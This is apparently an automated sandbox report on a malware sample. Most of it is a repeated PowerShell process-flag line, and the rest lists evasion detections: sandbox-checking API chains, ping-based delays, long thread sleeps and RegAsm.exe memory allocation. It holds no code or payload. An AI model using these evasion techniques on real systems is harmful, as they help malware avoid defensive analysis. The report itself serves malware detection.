Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep	graph_7-106959
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30			Jump to behavior

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Memory allocated: C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Memory allocated: 2780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Memory allocated: 4780000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Window / User API: threadDelayed 6928
